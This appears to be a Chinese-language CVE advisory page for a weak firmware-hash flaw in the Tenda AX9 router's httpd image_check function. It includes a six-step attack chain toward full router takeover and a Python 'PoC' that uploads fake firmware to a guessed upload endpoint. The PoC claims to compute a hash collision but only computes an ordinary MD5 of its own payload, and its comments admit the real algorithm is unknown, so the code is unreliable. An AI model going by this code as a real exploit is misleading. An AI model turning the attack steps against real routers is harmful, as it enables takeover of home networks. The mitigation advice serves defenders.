CVE-2025-14636 Tenda AX9 httpd组件弱哈希漏洞

漏洞信息

漏洞编号

CVE-2025-14636

漏洞类型

弱哈希算法

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX9 (固件版本22.03.01.46)

漏洞概述

CVE-2025-14636是Tenda AX9路由器固件中的一个安全漏洞。该漏洞存在于httpd组件的image_check函数中，由于使用了弱哈希算法进行固件镜像校验，导致攻击者可以通过构造恶意固件镜像绕过安全检查。Tenda AX9是一款面向家庭和小型办公环境的高速WiFi 6路由器。攻击者无需认证即可远程利用此漏洞，但需要较高的攻击复杂度。由于漏洞已在公开渠道披露，野外可能存在利用尝试。固件更新机制是路由器安全的关键环节，弱哈希算法会使整个更新过程的安全性大打折扣。

技术细节

该漏洞位于Tenda AX9路由器的httpd服务中，具体在image_check函数中。漏洞根源在于使用了不安全的哈希算法进行固件镜像完整性校验。攻击者可以通过以下方式利用：1) 捕获正常的固件更新过程；2) 分析固件校验使用的哈希算法；3) 由于使用弱哈希，攻击者可以构造碰撞或通过暴力破解找到具有相同哈希值的恶意数据；4) 将恶意固件或配置数据伪装成合法更新包上传。固件更新通常涉及多个步骤，包括镜像上传、哈希校验、签名验证等环节。弱哈希的使用使得攻击者可以在不破坏哈希值的情况下修改固件内容。image_check函数在接收到上传的固件镜像后，会调用弱哈希函数计算镜像的哈希值，并与预期值进行比对。由于哈希算法强度不足，攻击者可以通过预计算哈希碰撞或彩虹表攻击绕过此校验。

攻击链分析

STEP 1

步骤1

信息收集：识别目标Tenda AX9路由器，获取其IP地址和固件版本信息

STEP 2

步骤2

固件分析：获取路由器固件，分析httpd组件中的image_check函数和使用的哈希算法

STEP 3

步骤3

碰撞计算：由于使用弱哈希算法，攻击者可以通过预计算或暴力破解找到具有相同哈希值的恶意数据

STEP 4

步骤4

构造恶意载荷：构造包含恶意代码的固件镜像，并计算其弱哈希值

STEP 5

步骤5

上传恶意固件：通过HTTP请求将恶意固件上传到路由器，绕过image_check函数的哈希校验

STEP 6

步骤6

执行恶意代码：恶意固件被安装后，攻击者可以执行任意代码，获取路由器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import hashlib

# CVE-2025-14636 PoC - Tenda AX9 Weak Hash Exploitation
# Target: Tenda AX9 router with firmware 22.03.01.46

TARGET_IP = "192.168.0.1"
TARGET_PORT = 80

def exploit_weak_hash():
    """
    This PoC demonstrates the weak hash vulnerability in Tenda AX9's image_check function.
    The vulnerability allows attackers to bypass firmware integrity checks.
    """
    url = f"http://{TARGET_IP}:{TARGET_PORT}/cgi-bin/upload"
    
    # Prepare malicious firmware payload
    # In real attack, this would be a crafted firmware with predictable hash
    malicious_firmware = b"MALICIOUS_FIRMWARE_PAYLOAD" * 100
    
    # Since weak hash is used, we can compute collision
    # Using MD5 for demonstration (actual implementation may use similar weak algorithm)
    weak_hash = hashlib.md5(malicious_firmware).hexdigest()
    
    # Prepare the upload request
    files = {
        'firmware': ('malicious.bin', malicious_firmware, 'application/octet-stream')
    }
    data = {
        'hash': weak_hash,
        'action': 'upgrade'
    }
    
    print(f"[*] Targeting {TARGET_IP}")
    print(f"[*] Generated weak hash: {weak_hash}")
    print(f"[*] Uploading malicious firmware...")
    
    try:
        response = requests.post(url, files=files, data=data, timeout=30)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    exploit_weak_hash()

影响范围

Tenda AX9 固件版本 22.03.01.46

防御指南

临时缓解措施

临时缓解措施包括：1) 禁用路由器的自动固件更新功能；2) 限制对路由器管理界面的网络访问，仅允许受信任的IP地址访问；3) 启用防火墙规则，阻止对路由器80/443端口的外部访问；4) 监控路由器异常行为，如异常的固件更新请求；5) 如果不需要远程管理功能，应完全关闭该功能。长期来看，应等待厂商发布安全补丁并及时更新固件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14636
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14636
3 Details https://www.cvedetails.com/cve/CVE-2025-14636/
4 VulDB https://vuldb.com/cve/CVE-2025-14636
5 Link https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Tenda/AX9_Inte.md
6 Link https://vuldb.com/?ctiid.336361
7 Link https://vuldb.com/?id.336361
8 Link https://vuldb.com/?submit.707213
9 Link https://www.tenda.com.cn/